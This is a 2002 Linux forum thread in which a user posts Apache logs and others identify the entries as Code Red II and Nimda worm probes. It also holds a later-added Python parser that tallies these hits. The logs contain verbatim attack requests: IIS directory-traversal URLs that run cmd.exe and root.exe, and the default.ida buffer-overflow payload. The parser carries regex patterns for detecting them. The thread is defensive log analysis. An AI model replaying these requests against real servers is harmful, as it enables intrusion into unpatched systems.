apache logs


Its_ON
02-16-2002, 07:35 AM
Is this normal or should I do something about it?

Anybody know what this is?


[Mon Feb 11 01:26:34 2002] [error] [client 61.180.183.126] Client sent malformed Host header
[Mon Feb 11 02:56:42 2002] [error] [client 64.175.36.79] File does not exist: /var/www/html/scripts/root.exe
[Mon Feb 11 02:56:55 2002] [error] [client 64.175.36.79] File does not exist: /var/www/html/MSADC/root.exe
[Mon Feb 11 02:57:01 2002] [error] [client 64.175.36.79] File does not exist: /var/www/html/c/winnt/system32/cmd.exe
[Mon Feb 11 02:57:08 2002] [error] [client 64.175.36.79] File does not exist: /var/www/html/d/winnt/system32/cmd.exe
[Mon Feb 11 02:57:15 2002] [error] [client 64.175.36.79] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Mon Feb 11 02:57:22 2002] [error] [client 64.175.36.79] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Mon Feb 11 02:57:29 2002] [error] [client 64.175.36.79] File does not exist: /var/www/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Mon Feb 11 02:57:36 2002] [error] [client 64.175.36.79] File does not exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
[Mon Feb 11 02:57:42 2002] [error] [client 64.175.36.79] File does not exist: /var/www/html/scripts/..Á../winnt/system32/cmd.exe
[Mon Feb 11 02:57:55 2002] [error] [client 64.175.36.79] File does not exist: /var/www/html/scripts/..À¯../winnt/system32/cmd.exe
[Mon Feb 11 02:58:02 2002] [error] [client 64.175.36.79] File does not exist: /var/www/html/scripts/..Áœ../winnt/system32/cmd.exe
[Mon Feb 11 02:58:22 2002] [error] [client 64.175.36.79] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Mon Feb 11 02:58:28 2002] [error] [client 64.175.36.79] File does not exist: /var/www/html/scripts/..%2f../winnt/system32/cmd.exe


61.180.183.126 - - [11/Feb/2002:01:26:34 -0800] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 400 328 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:56:42 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 286 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:56:55 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:57:01 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:57:08 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:57:15 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:57:22 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:57:29 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:57:36 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:57:42 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:57:49 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:57:55 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:58:02 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:58:08 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:58:15 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:58:22 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:58:28 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
140.137.123.1 - - [11/Feb/2002:06:34:43 -0800] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 400 328 "-" "-"

Syngin
02-16-2002, 09:51 AM
That's Nimda or possibly Code Red trying to gain access. cmd.exe is the Win2k command to bring up a pseudo DOS window for further commands. Linux is immune to it so you can safely ignore it. Our main web server at work (RH) gets pinged by Nimda an average of once every 10 seconds.

I think the multiple N's are trying to exploit a big buffer overflow vulnerability in the base install of Win2k with IIS 5.

[ 16 February 2002: Message edited by: Syngin ]

tallulah
02-16-2002, 04:50 PM
Yes, the top one is Code Red II. The second is Nimda. They do hog bandwidth according to the size of your error pages. I posted a couple of links in response to your other post in web serving/security.

http://www.linuxnewbie.org/cgi-bin/ubbcgi/ultimatebb.cgi?ubb=get_topic&f=21&t=002705
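To make the identification in this thread repeatable, here is an added Python example (not code from the thread or any poster) that parses Apache combined-format access-log lines and tallies hits, bytes served and distinct clients per worm signature, so you can see how much of your bandwidth the error pages are eating. The sample lines are constructed, modelled on the ones posted above, with the Code Red payload shortened; the signatures are the ones named in the thread and would need extending for other scanners.

```python
import re
from collections import defaultdict
# Apache combined-format access log: client, timestamp, request, status, bytes.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\d+|-)'
)
# Signatures named in the thread: Code Red II requests /default.ida with a long
# run of N's; Nimda probes for root.exe or cmd.exe behind path-traversal tricks.
CODE_RED_RE = re.compile(r'^/default\.ida\?N{20,}', re.I)
NIMDA_RE = re.compile(r'^/(?:scripts|msadc)/root\.exe|/winnt/system32/cmd\.exe', re.I)

def parse_line(line):
    # Return the fields of one access-log line, or None if it does not parse.
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["bytes"] = 0 if rec["bytes"] == "-" else int(rec["bytes"])
    return rec

def classify(path):
    if CODE_RED_RE.match(path):
        return "code-red"
    if NIMDA_RE.search(path):
        return "nimda"
    return "other"

def summarize(lines):
    # Hits, bytes served (the error pages tallulah mentions) and distinct clients per label.
    out = defaultdict(lambda: {"hits": 0, "bytes": 0, "clients": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # skip lines that are not in combined format
        s = out[classify(rec["path"])]
        s["hits"] += 1
        s["bytes"] += rec["bytes"]
        s["clients"].add(rec["client"])
    return dict(out)

# Constructed sample modelled on the thread's lines (Code Red payload shortened).
SAMPLE_LOG = [
    '61.180.183.126 - - [11/Feb/2002:01:26:34 -0800] "GET /default.ida?' + "N" * 40 + '%u9090%u6858%u00=a HTTP/1.0" 400 328 "-" "-"',
    '64.175.36.79 - - [11/Feb/2002:02:56:42 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 286 "-" "-"',
    '64.175.36.79 - - [11/Feb/2002:02:57:15 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"',
    '64.175.36.79 - - [11/Feb/2002:02:58:08 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291 "-" "-"',
    '192.0.2.10 - - [11/Feb/2002:03:00:00 -0800] "GET /index.html HTTP/1.0" 200 1024 "-" "-"',
]
```

Run `summarize(open("/var/log/httpd/access_log"))` to get the same tally over a real log; the byte totals per label are what the error-page bandwidth cost amounts to.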

evilcartman
02-17-2002, 06:00 AM
Damn old IIS Unicode vulnerabilities :D It can be Nimda, Code Red or a scan... :cool: